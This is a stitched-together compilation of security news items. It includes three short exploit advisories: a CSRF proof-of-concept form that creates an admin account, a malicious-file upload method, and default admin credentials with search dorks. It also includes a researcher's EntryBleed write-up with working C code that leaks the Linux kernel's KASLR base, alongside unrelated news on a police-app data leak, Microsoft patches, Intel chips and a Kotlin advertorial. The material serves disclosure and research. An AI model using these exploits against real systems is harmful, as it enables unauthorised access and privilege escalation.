Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://medisensecrm.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] infected file : /Add-User1.php .[+] save code as poc.html .<h2>Add New User</h2>    <form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">    <h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>    <h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>    <h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>    <h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">    <input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>    <input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  </div>  </form>    </div></div>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Medisense-Healthcare Solutions CRM 2.0 Cross Site Request Forgery

ERPGo SaaS CRM version 3.3 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : ERPGo SaaS CRM v3.3 Arbitrary File Upload Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426           |  | # Dork      : "ERPGo SaaS" login                                                                                                 |                "All In One Business ERP With Project, Account, HRM, CRM"                                                          |“Attention is the new currency”  The more effortless the writing looks, the more effort the writer actually put into the process.  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account [+] Go to your membership profile and upload a malicious file instead of an image <===| https://erpgo.127.0.0.1/erpgo-saas/profile[+] Your Ev!l = https://erpgo.127.0.0.1/erpgo-saas/storage/uploads/avatar/zip_1671699428.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

ERPGo SaaS CRM 3.3 Arbitrary File Upload

eCart Web version 4.0.0 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : eCart Web v4.0.0- Multi Vendor eCommerce Marketplace Insecure Settings Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/ecart-web-multi-vendor-ecommerce-marketplace/33201609                                  |  | # Dork      : Copyright © 2022 Made By WRTEAM.                                                                                   |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin123[+] https://127.0.0.1.com/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

eCart Web 4.0.0 Insecure Settings

A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.

Recently, I’ve discovered that Linux KPTI has implementation issues that can allow any unprivileged local attacker to bypass KASLR on Intel based systems. While technically only an info-leak, it still provides a primitive that has serious implications for bugs previously considered too hard to exploit and was assigned CVE-2022-4543. As you’ll see why from the writeup later on, I have decided to term this attack “EntryBleed.”

KPTI (or its original name KAISER) stands for Kernel Page Table Isolation. It was introduced as a patch for the Meltdown micro-architectural vulnerabilities a few years ago, where unprivileged attackers could utilize a side channel to bypass KASLR. According to documentation, KPTI basically splits apart the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; the user on the other hand will only have the minimal amount of kernel virtual memory mapped in, like exception/syscall entry handlers and anything else necessary for the user to kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses for CPU side-channel attacks, then clearly it has failed as of this post.

In 2016, Daniel Gruss discovered the concept of the prefetch sidechannel. I used one variant of it, which specifically utilized the TLB (the caching mechanism for virtual to physical address translations) as a side-channel mechanism. x86\_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish slower when the address is not present (and a page table walk needs to be done). At its time, it was known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high resolution timing instructions like “RDTSC.”

Before I continue with the attack, it must be noted that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense based on the purpose of KPTI/KAISER and seemed to be the consensus when talking to a few other security researcher friends.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which is at a constant offset from KASLR base based on /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for when a 64 bit syscall gets executed. Notice how the handler executes a few instructions first before switching to the kernel CR3 (if KPTI is on) - this means that this function has to still be mapped in userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same address in userland as it is in kernel using its KASLR rebased address - this sounds very suspicious!

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry\_SYSCALL\_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone can correct me if I'm wrong here.

Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load in normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped with a fence instruction for it to work in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup\_64):

#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define KERNEL\_LOWER\_BOUND 0xffffffff80000000ull #define KERNEL\_UPPER\_BOUND 0xffffffffc0000000ull #define entry\_SYSCALL\_64\_offset 0x400000ull uint64\_t sidechannel(uint64\_t addr) { uint64\_t a, b, c, d; asm volatile (".intel\_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr \[%4\];" "prefetcht2 qword ptr \[%4\];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att\_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN\_START KERNEL\_LOWER\_BOUND + entry\_SYSCALL\_64\_offset #define SCAN\_END KERNEL\_UPPER\_BOUND + entry\_SYSCALL\_64\_offset #define DUMMY\_ITERATIONS 5 #define ITERATIONS 100 #define ARR\_SIZE (SCAN\_END - SCAN\_START) / STEP uint64\_t leak\_syscall\_entry(void) { uint64\_t data\[ARR\_SIZE\] = {0}; uint64\_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY\_ITERATIONS; i++) { for (uint64\_t idx = 0; idx < ARR\_SIZE; idx++) { uint64\_t test = SCAN\_START + idx \* STEP; syscall(104); uint64\_t time = sidechannel(test); if (i >= DUMMY\_ITERATIONS) data\[idx\] += time; } } for (int i = 0; i < ARR\_SIZE; i++) { data\[i\] /= ITERATIONS; if (data\[i\] < min) { min = data\[i\]; addr = SCAN\_START + i \* STEP; } printf("%llx %ld\\n", (SCAN\_START + i \* STEP), data\[i\]); } return addr; } int main() { printf ("KASLR base %llx\\n", leak\_syscall\_entry() - entry\_SYSCALL\_64\_offset); }

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve managed to have this work on multiple Intel CPUs (including i5-8265U, i7-8750H,  i7-9700F, i7-9750H, Xeon(R) CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work though). I'm not sure how the TLB side-effects are preserved in a VM scenario though across CR3 writes and potential VM exits - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see edit in the end). Lastly, I don't believe the repeated syscalls are necessary in my exploit as later tests show that it worked without making them with each measurement most likely due to the global bit, but I still kept it in my exploit just to guarantee its existence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.

In conclusion, Linux KPTI doesn’t do it’s job and it’s still quite easy to get KASLR base. I’ve already emailed security@kernel.org as well as relevant mailing lists for distros, and was authorized to disclose this as a potential fix might take a while. I’m honestly not too sure what the best approach to fix this as it’s more of an implementation issue, but I suggested that to randomize the virtual address of entry/exit handlers that are mapped into userspace, have them be at a fixed virtual address unrelated to kernel base, or have a randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.

CVE-2022-4543: EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

By Owais Sultan
Find out what Kotlin app development will bring to your company, which global giants have already taken advantage…
This is a post from HackRead.com Read the original post: Kotlin app development company – How to choose

Find out what Kotlin app development will bring to your company, which global giants have already taken advantage of it, and how to choose a reliable Kotlin app development company.

**How to Choose Kotlin App Development Company?**

Choosing the right tech stack is the key to ensuring your digital solution keeps up with the times, i.e., meets current trends and satisfies consumer needs. By “right,” we mean advanced tools that allow you to create high-performance, functional and easily scalable software.

Kotlin can be safely attributed to the list of such programming languages and the companies that work with it to the promising suppliers of software products in today’s market. 

Today we’ll talk about why Kotlin is so in demand with developers and their clients and discuss why it’s so important to choose a reliable Kotlin app development company.

**All You Need To Know About Kotlin**

Kotlin is an object-oriented programming language with static typing that was created more than 10 years ago and was originally considered an alternative to Java. However, its creators have made it so compact, convenient, and versatile that it has surpassed in popularity both Java and other equally popular languages, like JavaScript, Ruby, and C++. 

In addition to its popularity among programmers, Kotlin is trusted by the world’s IT industry flagships. Jira, Adobe, Reddit, Twitter, Netflix, and many others have adopted it. Most of the most popular programs on the Play Market are written in it, and Google even declared it the preferred language for Android development. 

Note the reasons why you should find a reliable Kotlin app development company now:

1.  **The demand for this language among successful companies.** According to statistics, many well-known corporations plan to migrate their digital solutions to Kotlin by the end of 2022. Uber and Pinterest are among those that have already done so.
2.  **Compliance with modern software requirements.** Kotlin allows you to write 40% less code than Java. This helps teams achieve one of their main goals: get the finished product to market faster. Other benefits include writing error-free code and creating easily scalable digital products. It is also handy for Data Science, including creating machine learning models.
3.  **Versatility of language.** Kotlin’s creators claim that “Kotlin is a language for all platforms.” That is, it can be used to write digital solutions for mobile and smart devices (e.g., Android, iOS, WatchOS) and desktop apps for macOS, Windows, Linux, etc. You can also order the development of a cross-platform product. This is possible thanks to Multiplatform technology, the benefits of which have already been used by many global giants, including Netflix, Baidu, and PlanGrid.

Enough arguments in favour of Kotlin software development, right? Let’s discuss what to look for when choosing a company that specializes in creating Kotlin apps.

**Kotlin Developer Selection Criteria **

When choosing a Kotlin app development company, pay attention to the reputation of the provider itself, as well as the performance of the individual developers it works with. Below are three parameters by which we recommend evaluating the professionalism of Kotlin developers:

**1: Hands-on experience.** The skills of the developer who will be involved in your project should not be limited to theory. A good specialist must have practical experience in writing different types of apps in this and other languages, as well as a good understanding of object-oriented programming, web service concepts, and mobile solution architecture. 

**2: Tech stack.** According to statistics, 92% of developers wrote code in Java before switching to Kotlin. Of these, 86% continue to program in Java in parallel with Kotlin, and among other tools that are popular with these programmers are JavaScript, SQL, and HTML/CSS. Consequently, knowledge of this technology stack will be one of the first hard skills to test when selecting a candidate. 

Another important point is a thorough understanding of XML markup language, as it is necessary for the layout of a mobile and web solution. We should also not forget about Android tools because the priority area of using Kotlin is still mobile development.

**3: Personality traits.** No matter how first-rate a developer is, they will not benefit your company if they do not know how to work in a team and do not possess other important soft skills. When choosing a programmer, look for these qualities: 

*   research skills;
*   ability to adapt;
*   ability to manage time;
*   the desire for self-development;
*   ability to defend their own position.

To avoid making a mistake with a Kotlin-development service provider, turn only to proven companies with extensive market experience, a positive reputation, and an impressive portfolio with successful cases.

**Top 5 Kotlin App Development Companies**

Are you looking for the best developers to implement your project? Here is a list of time-tested Kotlin app development companies.

**\-> Brights**

Brights is a company that has been developing digital solutions for clients worldwide for 11 years. Their agile team of 100 people specializes in creating fintech startups and developing enterprise software. They are not afraid of the responsibility of implementing bold solutions and provide a full range of services, from hypothesis testing to testing, release, and subsequent optimization of a full-fledged digital product.

Services provided:

*   Web Development.
*   Mobile solution creation.
*   UI/UX design.
*   QA testing.
*   Machine Learning.
*   DevOps security.

Distinguishing features:

*   comprehensive software development services;
*   creation of digital solutions within the agreed time and budget;
*   the use of advanced technologies and tools;
*   high-quality communication with the customer.

**\-> Concetto Labs**

Working for seven years on the market, Concetto Labs Agile team has managed to implement more than 500 successful projects. The specialists of this company specialize in Microsoft development services. They develop mobile and web software for businesses of all sizes, from small startups to large corporations.

Services provided:

*   Powerapps Development.
*   Power BI Development.
*   Power Automate Development.
*   ASP.NET Core Development.
*   Microsoft Office 365 Add-ins Development.
*   Azure Data Factory.

Distinguishing features:

*   24/7 user support;
*   competitive prices and speed of delivery;
*   flexible interaction models.

**\-> Hidden Brains **

Hidden Brains is one of the leading Kotlin software development companies. Its specialists create functional apps for Android that are distinguished by high performance. The company has worked successfully with clients from over 100 countries for 19 years.

Services provided:

*   Development of web programs.
*   Creation of apps for mobile devices.
*   Frontend development.
*   Microsoft development.
*   Digital solution prototyping.
*   Cloud technology and DevOps.

Distinguishing features:

*   broad industry expertise;
*   dedicated team of Kotlin developers;
*   experience with ML, IoT, and AI technologies;
*   experience in creating chatbots.

**\-> Techahead******

The company has been creating customer-centric and easily scalable solutions for mobile and web platforms since 2009. The Techahead team has experience working with leaders in various industries, including finance, real estate, e-commerce, insurance, and many others. 

Services provided:

*   Mobile and web development.
*   Modernization and maintenance of digital solutions.
*   Cloud engineering and IoT.
*   research and consulting.
*   UX/UI design.
*   DevOps.
*   QA and testing.
*   User analytics.
*   Digital marketing.

Distinguishing features:

*   experience working with Fortune 500 brands;
*   turnkey design and development;
*   quick adaptation to the code of the existing project when upgrading it;
*   attention to detail.

**\-> Mobiloitte******

Mobiloitte positions itself as a Blockchain and Metaverse Company that is as focused as possible on its digital products’ security, scalability, and performance. For 18 years, the company has accumulated over 4,500 successfully completed projects in its portfolio, and millions of satisfied consumers use its software products.

Services provided:

*   IoT.
*   Blockchain development.
*   Backend technologies.
*   Creation of digital products for mobile devices.
*   Artificial Intelligence and Machine Learning.
*   Audit of smart contracts.

Distinguishing features:

*   strict adherence to deadlines;
*   use of trendy technologies;
*   high quality of work and 100% customer satisfaction.

**Summarizing**

Hiring a dedicated team of Kotlin developers is a great alternative to hiring in-house specialists. It will save your budget without sacrificing the quality of the finished product or the speed of its release. Turn to a trusted software development service provider and follow global trends in digital transformation.

1.  Top 10 Things to do During Development
2.  How to Choose Tech Stack for Mobile App Development
3.  Benefits of CI/CD for Your Software Development Company
4.  How to Choose the Right Web Development Firm for Startup?
5.  Development of Corporate Apps Based on Artificial Intelligence

Kotlin app development company – How to choose

SweepWizard, an app that law enforcement used to coordinate raids, left sensitive information about hundreds of police operations publicly accessible.

Last September, law enforcement agents from five counties in Southern California coordinated an operation to investigate, raid, and arrest more than 600 suspected sex offenders. The mission, Operation Protect the Innocent, was one of the largest such raids in years, involving ​​over 64 agencies. According to the Los Angeles Police Department, it was coordinated using a free trial of an app called SweepWizard.

The raid was hailed as a success by Chief Michael Moore of the LAPD at a press conference the following week. But there was a problem: Unbeknownst to police, SweepWizard had been leaking a trove of confidential details about the operation to the open internet.  

The data, which the LAPD and partners in the regional Internet Crimes Against Children (ICAC) Task Force uploaded to SweepWizard, included private information about the suspects as well as sensitive details that, in the wrong hands, could tip off suspects as to when they were going to be raided and cast suspicion on people who had not yet been convicted of any crime. 

The SweepWizard app, built by a company called ODIN Intelligence, is meant to help police manage multi-agency raids. But WIRED found that it didn’t just expose data from Operation Protect the Innocent; it had already leaked confidential details about hundreds of sweeps from dozens of departments over multiple years. The data included personally identifying information about hundreds of officers and thousands of suspects, such as geographic coordinates of suspects’ homes and the time and location of raids, demographic and contact information, and occasionally even suspects’ Social Security numbers. All this data was likely exposed due to a simple misconfiguration in the app, according to security experts.

The Los Angelese Police Department said it was unaware of the problem until WIRED reached out for comment. In a phone call, Captain Jeffery Bratcher, commanding officer of the LAPD Juvenile Division and project director for the ICAC Task Force, said the department is concerned and is taking the matter seriously. “Operational security is always paramount to us. We don’t want people to know when and if we are coming,” he says. 

In a separate statement, Captain Kelly Muniz of the LAPD’s Media Relations Division, said the department has suspended the use of SweepWizard until a thorough investigation is complete. According to their statement, “the department is working with federal law enforcement to determine the source of the unauthorized release of information, which is currently unclear. At this point in the investigation, it has not been determined if the third-party application or another means is the source of the unauthorized release.”

The exposed data contained the location and names of 5,770 suspects, mostly located in California. In some instances, the data included their height, weight, and eye color and indicated whether they were experiencing homelessness. For more than 1,000 of these suspects, SweepWizard also exposed their Social Security numbers. According to the data, several of these suspects were juveniles at the time of the sweeps. Arrest records and press releases confirm that several people whose names appeared in the leaked data were arrested after the raid. 

SweepWizard also appeared to have revealed the names, phone numbers, and email addresses of hundreds of law enforcement officers, as well as the operational details of nearly 200 sweeps. These details included the exact date and time of the sweep, the organizing officers, as well as information like where the pre-sweep briefings were to occur.

After verifying the data exposure, WIRED notified ODIN Intelligence, which quickly took down the app and began an investigation. After declining an interview, Erik McCauley, the CEO and founder of the company, said in a statement, “ODIN Intelligence Inc. takes security very seriously.  We have and are thoroughly investigating these claims.” He added, “Thus far, we have been unable to reproduce the alleged security compromise to any ODIN system. In the event that any evidence of a compromise of ODIN or SweepWizard security has occurred, we will take appropriate action.” McCauley did not respond to specific questions about the issue.

At the time of publication, SweepWizard’s website is no longer accessible, and the app has been removed from Google Play and Apple’s App Store.

WIRED received a tip that there was a flaw in SweepWizard’s application programming interface, or API, that allowed anyone with a specific URL to retrieve confidential law enforcement data from the app. WIRED downloaded the Android version of the app from Google Play and verified that its API endpoints were in fact returning data regardless of authentication—in other words, you didn’t need to be logged in to the app to view sensitive data about years’ worth of raids and other police operations. The data could be viewed in any web browser simply by visiting a SweepWizard URL. 

While the SweepWizard mobile app first launched in 2016, according to app store information, WIRED found data from sweeps going back to 2011, including more than 20 sweeps on Halloween over the years with names like Operation Boo, Operation Hocus Pocus, and Halloween Havoc. (Archived versions of the SweepWizard website date back to 2011.) The most recent data WIRED reviewed includes sensitive information about raids that took place on December 19, 2022. 

It’s unclear whether all SweepWizard data was exposed ahead of scheduled raids, and ODIN Intelligence did not respond to specific questions about when the data may have been publicly accessible. However, while confirming the API vulnerability, WIRED observed that data from at least one scheduled sweep had been made public. It is also unclear whether anyone used the data SweepWizard leaked to the open web for nefarious purposes.

ODIN Intelligence advertises itself as a company that develops high-tech solutions for law enforcement that “enable our communities to be safer, better informed, more organized, and crime free.” On its website, the company claims to partner with organizations like the International Association of Chiefs of Police (details of these partnerships are not available). The IACP did not respond to a request for comment. ODIN also created a product called the Homeless Management Information System (HMIS), which according to a brochure reviewed by Vice, uses face recognition to identify people experiencing homelessness. 

The company claims that its products are built by experts and secured with “state-of-the-art” security that adheres to the FBI’s Criminal Justice Information Services (CJIS) security policy for handling sensitive information. The FBI did not comment on SweepWizard’s claims of CJIS compliance. However, a policy document the agency shared with WIRED indicates that SweepWizard was likely not compliant with specific access requirements that specify who can access law enforcement information. ODIN Intelligence’s McCauley did not respond to specific questions about whether SweepWizard was CJIS-compliant.

The Yolo County District Attorney’s Office confirmed that, like the LAPD, it had used a free trial of SweepWizard during an annual sex offender sweep last November, details of which WIRED found in the exposed data. In its statement, chief deputy district attorney Jonathan Raven said that ODIN provided Yolo County with documents that explicitly stated its technology was CJIS-compliant. His office is also investigating the matter. 

Ken Munro, an ethical hacker and founder of the UK-based security research firm Pen Test Partners, says that based on how we described being able to access SweepWizard data, the error was likely caused by a simple authorization oversight. While SweepWizard was taken down before he had a chance to examine the app, Munro says that, typically, when an individual logs in to a website or app, they are assigned an access token that gets checked by the app every time their device requests data from it. According to Munro, SweepWizard was likely not checking each request for these access tokens and was simply providing data to any device that asked. 

“This is a bit of a basic technical oversight,” he says. “These sorts of authorization issues are not often seen in law enforcement.”

McCauley did not comment on how ODIN’s investigation concluded that a compromise had not occurred. However, after WIRED received his statement, we reviewed our methodology and findings about SweepWizard with Zach Edwards, an independent privacy and security researcher.  Edwards says that WIRED’s methodology is no different than what any penetration tester would have done. He adds, “They left the front, side, and back doors open.”

A Police App Exposed Secret Details About Raids and Suspects

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.
11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.

11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release updates for its Chromium-based Edge browser.

The vulnerability that's under attack relates to CVE-2023-21674 (CVSS score: 8.8), a privilege escalation flaw in Windows Advanced Local Procedure Call (ALPC) that could be exploited by an attacker to gain SYSTEM permissions.

"This vulnerability could lead to a browser sandbox escape," Microsoft noted in an advisory, crediting Avast researchers Jan Vojtěšek, Milánek, and Przemek Gmerek for reporting the bug.

While details of the vulnerability are still under wraps, a successful exploit requires an attacker to have already obtained an initial infection on the host. It is also likely that the flaw is combined with a bug present in the web browser to break out of the sandbox and gain elevated privileges.

"Once the initial foothold has been made, attackers will look to move across a network or gain additional higher levels of access and these types of privilege escalation vulnerabilities are a key part of that attacker playbook," Kev Breen, director of cyber threat research at Immersive Labs, said.

That having said, the chances that an exploit chain like this is employed in a widespread fashion is limited owing to the auto-update feature used to patch browsers, Satnam Narang, senior staff research engineer at Tenable, said.

It's also worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply patches by January 31, 2023.

What's more, CVE-2023-21674 is the fourth such flaw identified in ALPC – an inter-process communication (IPC) facility provided by the Microsoft Windows kernel – after CVE-2022-41045, CVE-2022-41093, and CVE-2022-41100 (CVSS scores: 7.8), the latter three of which were plugged in November 2022.

Two other privilege escalation vulnerabilities identified as being of high priority affect Microsoft Exchange Server (CVE-2023-21763 and CVE-2023-21764, CVSS scores: 7.8), which stem from an incomplete patch for CVE-2022-41123, according to Qualys.

"An attacker could execute code with SYSTEM-level privileges by exploiting a hard-coded file path," Saeed Abbasi, manager of vulnerability and threat research at Qualys, said in a statement.

Also resolved by Microsoft is a security feature bypass in SharePoint Server (CVE-2023-21743, CVSS score: 5.3) that could permit an unauthenticated attacker to circumvent authentication and make an anonymous connection. The tech giant noted, "customers must also trigger a SharePoint upgrade action included in this update to protect their SharePoint farm."

The January update further remediates a number of privilege escalation flaws, including one in Windows Credential Manager (CVE-2023-21726, CVSS score: 7.8) and three affecting the Print Spooler component (CVE-2023-21678, CVE-2023-21760, and CVE-2023-21765).

The U.S. National Security Agency (NSA) has been credited with reporting CVE-2023-21678. In all, 39 of the vulnerabilities that Microsoft closed out in its latest update enable the elevation of privileges.

Rounding up the list is CVE-2023-21549 (CVSS score: 8.8), a publicly known elevation of privilege vulnerability in the Windows SMB Witness Service, and another instance of security feature bypass impacting BitLocker (CVE-2023-21563, CVSS score: 6.8).

"A successful attacker could bypass the BitLocker Device Encryption feature on the system storage device," Microsoft said. "An attacker with physical access to the target could exploit this vulnerability to gain access to encrypted data."

Furthermore, Redmond has updated its guidance regarding the malicious use of signed drivers (called Bring Your Own Vulnerable Driver) to include an updated block list released as part of Windows security updates on January 10, 2023.

CISA on Tuesday also added CVE-2022-41080, an Exchange Server privilege escalation flaw, to the KEV catalog following reports that the vulnerability is being chained alongside CVE-2022-41082 to achieve remote code execution on vulnerable systems.

The exploit, codenamed OWASSRF by CrowdStrike, has been leveraged by the Play ransomware actors to breach target environments. The defects were fixed by Microsoft in November 2022.

The Patch Tuesday updates also arrive as Windows 7, Windows 8.1, and Windows RT reached end of support on January 10, 2023. Microsoft said it won't be offering an Extended Security Update (ESU) program for Windows 8.1, instead urging users to upgrade to Windows 11.

"Continuing to use Windows 8.1 after January 10, 2023 may increase an organization's exposure to security risks or impact its ability to meet compliance obligations," the company cautions.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens
*   Synology
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues January 2023 Patch Tuesday Updates, Warns of Zero-Day Exploit

After a delay of more than a year, Intel's on-chip confidential computing feature is coming to all the major cloud providers, starting with Microsoft's Azure.

Intel launched on Tuesday its newest server chips, code-named Sapphire Rapids, which will form the backbone of server infrastructure in the public and private cloud.

The chips have built-in security features the company says will prevent attackers from stealing high-value data from computer systems, ensure regulatory compliance, and maintain data sovereignty. These 4th Gen Intel Xeon scalable processors will increase the baseline enclave, and Intel SGX will be able to accurately and securely verify application software loaded in that enclave, the chip giant said in a statement. These server chips fit in with Intel's confidential computing portfolio.

Confidential computing refers to a security mechanism where a bubble of protection is added around data as it travels over the network between computing systems. That is done through encryption. The Xeon chips add techniques to verify the integrity of code and authentication measures to ensure the data is accessible only to authorized individuals and systems.

The chips create trusted boundaries — which Intel calls trusted execution environments, or TEEs — in which code can be executed. A feature called Trust Domain Execution (TDX) locks down code in a secure enclave that can only be unlocked by those with the right keys or codes. The process of verifying and unlocking the code is called attestation.

The TDX instructions add a boundary around the virtual machine and everything in it, including the guest OS and apps in it, and removes the cloud service provider or other cloud tenants from a trust boundary, said Anil Rao, vice president and general manager for systems architecture & engineering at Intel's office of the CTO.

TDX leverages a security feature on Xeon chips called Software Guard Extensions (SGX), which is widely used today as a secure enclave to protect data in execution environments. But TDX is much larger in scope and covers a wider range of applications, such as AI in virtualized environments.

**Securing Virtual Machines**

